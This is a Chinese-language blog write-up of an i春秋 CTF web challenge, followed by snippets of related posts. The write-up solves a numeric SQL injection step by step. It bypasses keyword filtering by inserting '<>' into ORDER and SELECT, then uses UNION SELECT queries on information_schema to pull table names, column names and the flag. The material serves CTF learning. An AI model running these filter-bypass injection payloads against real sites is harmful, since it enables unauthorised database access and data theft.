i春秋CTF训练 Web SQL

最新推荐文章于 2024-05-11 22:44:48 发布
最新推荐文章于 2024-05-11 22:44:48 发布
阅读量481 收藏
点赞数 1
分类专栏: CTF 文章标签: mysql sql
来自 椰奶冻不安全 的博客,复制完可要记得我吖
本文链接:https://blog.csdn.net/qq_40654505/article/details/106990334
版权

Web SQL

题目内容:出题人就告诉你这是个注入,有种别走!

链接需到ichunqiu网站申请

xxx.changame.ichunqiu.com/index.php?id=1

在这里插入图片描述

xxx.changame.ichunqiu.com/index.php?id=1=1
xxx.changame.ichunqiu.com/index.php?id=1=2

1=1时正常访问,1=2时页面为空白,为数字型注入

xxx.changame.ichunqiu.com/index.php?id=1 order by 1

在这里插入图片描述
可能是关键字过滤,经尝试,利用服务器对XSS的防护,删除<>的特性注入

xxx.changame.ichunqiu.com/index.php?id=1 ord<>er by 1

如果用or<>der 会构造or,这个字符串也被过滤了

3正常访问,4访问失败,则长度为3

xxx.changame.ichunqiu.com/index.php?id=1 ord<>er by 3
xxx.changame.ichunqiu.com/index.php?id=1 ord<>er by 4

找到回显位置

xxx.changame.ichunqiu.com/index.php?id=1 union se<>lect 1,2,3

在这里插入图片描述
显示当前数据库名

xxx.changame.ichunqiu.com/id=1 union se<>lect 1,database(),3

在这里插入图片描述

显示所有表名

xxx.changame.ichunqiu.com/index.php?id=1 union se<>lect 1,table_name,3 from information_schema.tables

显示当前调用的表

xxx.changame.ichunqiu.com/index.php?id=1 union se<>lect 1,table_name,3 from information_schema.tables where table_schema=database()
或者也可以
xxx.changame.ichunqiu.com/id=1 union se<>lect 1,table_name,3 from information_schema.tables where table_schema='sqli'

在这里插入图片描述

显示info表中的列名

xxx.changame.ichunqiu.com/id=1 union se<>lect 1,column_name,3 from information_schema.columns where table_name='info'

在这里插入图片描述

得到key

xxx.changame.ichunqiu.com/id=1 union se<>lect 1,flAg_T5ZNdrm,3 from info

在这里插入图片描述

椰奶冻不安全
关注
专栏目录
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 475
个人CTF学习之路
第三届上海市大学生网络安全大赛 i春秋CTF Web解题思路
曹振国的博客
05-01 1206
SOME WORDS1.发现SQL注入2.尝试SQLMap3.经实验发现过滤了"="和"and"reverse()函数flag总结 1.发现SQL注入 ?id=1 有数据 ?id=2 有数据 ?id=2-1 有数据 2.尝试SQLMap 发现报错: 3.经实验发现过滤了"=“和"and” 发现页面会返回错误信息,尝试报错注入: 用到函数:updatexml updatexml(目标xml内容,xml文档路径,更新的内容) 查询库名 ?id=updatexml(1,concat(0x7e,
i春秋 WEB SQL
A_dmin的博客
06-20 881
i春秋 WEB SQL 一天一道CTF题目,能多不能少 打开网页,发现有个id参数,而且有提示: 查看网页源代码,发现有sql语句显示: 直接抓包,发现and,or,order好像被过滤了, 使用/**/,发现还是不行: 经过尝试发现,可以使用<>绕过关键字过滤 经过尝试,得到有三个字段: 使用union查询,发现select也被过滤掉了,同理使用<> 发现2的位置...
i春秋web
qq_58091216的博客
03-28 4374
3.21 1.题目名称:常见的搜集 题目内容:一共3部分flag 敏感文件 解题思路:用dirsearch扫描网站 ,发现三个文件robots.txt,index.php~ ,.index.php.swp, dirsearch -u http://eci-2zegi8jh6a7iw18p2ptc.cloudeci1.ichunqiu.com/ 我们依次访问就可以得到flag 2.题目名称:粗心的小李...
ctf训练 web安全SQL注入get
qq_43799246的博客
12-02 443
ctf训练 web安全SQL注入get SQL注入漏洞介绍 sQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL注入的产生原因通常表现在以下几方面: ①不当的类型处理; ②不安全的数据库配置; ③不合理的查询集处理; ④不当的错误处理; ⑤转义字符处理不合适; ⑥多个提交处理不当。 实验环境 一台kail攻击机 和 靶机 靶机镜像:
i春秋CTF-训练SQL注入-2 一鱼三吃 sqlmap bp手注 python脚本
AAAAAAAAAAAA66的博客
11-30 511
目录 题目 做题前获取的信息 一鱼三吃 sqlmap burp手注 python自动化脚本 题目 做题前获取的信息 F12查看源码得到提示 依照题目信息,post提交数据。 一鱼三吃 sqlmap 随便输入用户名,密码 提交 burp拦截 右键 Copy to file 文件保存为2.txt 我用的burp是在windows环境下的,所以把2.txt 复制放在kail桌面。(也可以自己在虚拟机创建一个2.txt文件 ,把bp中的数据粘贴到文件中...
ichunqiu Web SQli wp
weixin_45253216的博客
01-11 271
2020.1.10 菜鸡今天又来水题了。 其实这个题,不是很水【狗头】在i春秋平台上看到了一道名为SQli的web题,想到了自己玩过1%的那个靶场也叫sqli-libs,于是手贱的打开了。咋一看还蛮友善的,其实涉及的知识点还蛮多的(自我感觉,毕竟不会的太多了) 本题涉及的知识有: waf fuzz测试 sqli注入fuzz字典 spintf()函数格式化字符串,导致单引号逃逸 实践判断sql注入点 sqlmap多参数使用 编写利用脚本 如果还有相关知识再做补充,下面开始本题wp。 首先进入题目环境,是一
i春秋-CTF
爆破胡同的博客
01-19 3332
VID 查看网页源代码发现有个文件路径 访问的看到了有三个参数用get方式提交 在url后提三个参数和对应的值就看到了一个1chunqiu.zip 访问就可以下载文件 这里需要进行代码审计 先看log.php界面if(isset($_POST['username']) && isset($_POST['password']) && isset($_POST['numb
暑期练习web22:sqli (i春秋sql盲注,逗号绕过
qq_41618162的博客
08-23 1132
这道题一打开就是个白板,开始还以为网不好还没加载出来。。。查看源码 看到了login.php这个路径,于是满怀欣喜的访问它 结果进去后什么都没得。。。以前也遇到过这种情况,所以拿bp抓一下包,也没发现东西 这下就一筹莫展了,于是参考了一下wp,才知道发生了302重定向,简单说就是从一个跳转到另一个页面,而且这个过程是我们刚进入题目连接就发生了的 这里一个是1 另一个是l,很容易混淆...
i春秋 “百度杯”CTF比赛 十月场 vld writeup
weixin_43442029的博客
01-19 760
0x00 题目名字叫“vld”,打开链接后也提示“do you know Vulcan Logic Dumper?” 同时在源码也给了一个文件位置。 打开文件后是一堆看不懂的东西,在网上搜索一下Vulcan Logic Dumper,发现是一个php的调试器,index.php.txt里的内容是php的详细的运行过程。大概的逻辑是比较三个get参数的值,正确就输出下一条线索,错误就输出false...
SQL手工注入实例
01-04
这是一个简单的小实例,供大家学习交流使用,通过简单的模仿使大家对注入技术有所了解,通过一次成功的注入,增加学习的兴趣
ctfshow web入门 sql注入
weixin_74427106的博客
02-10 2983
sql注入分为多种类型的注入,我将对ctfshow web入门的sql入门进行题目分类,并在最后对每种sql注入做一下总结;
CTF Web SQL注入专项整理(持续更新中)
m0_73734159的博客
10-19 3884
SQL注入专项整理
CTFHub | webSQL注入(整数型注入)
2301_76435948的博客
09-23 266
拿到flag。
i春秋WEB CTF 2
cbhjerry的博客
11-16 2813
题6:SQL,出题人就告诉你这是个注入,有种别走! 解题:这是一个存在sql注入漏洞的题目, 通过手工测试发现程序对"SELECT","ORDER"进行了识别,即判断为注入行为,虽然对"AND"不进行识别,但如果其后面有"="同样认定为注入行为。同时发现了对"&lt;&gt;"进行了过滤,因此可将以上3个关键字换成"SELEC&lt;&gt;T",&quo
ctf-web-sql注入
热门推荐
god_001的博客
05-03 1万+
题目链接:跳转提示 打开网页,一个登陆页面,根据题是本题题型是基于布尔的SQL盲注 首先在用户名处输入admin 得到结果: 即密码确为admin,而如果不输入用户名直接输入密码,发现报错 可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。 经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用 尝试输入
CTFweb篇-SQL注入(一)
weixin_44597701的博客
08-12 1520
基本函数和知识 基本数据库information_schema information_schema是一个数据库,放的是一些视图,在SQL文件中找不到。 其中具有表schemata(数据库名)、tables(表名)、columns(列名获字段名) schemata表中有schema_name来存储数据库名 在tables表中,table_schema和table_name来存储数据库名和表名 在columns表中,有table_schema、table_name、column_name 基本函数 user(
BUUCTF web SQL注入篇
m0_55854679的博客
08-09 3070
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 2022
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
mysqlSQL注入:CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入在Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值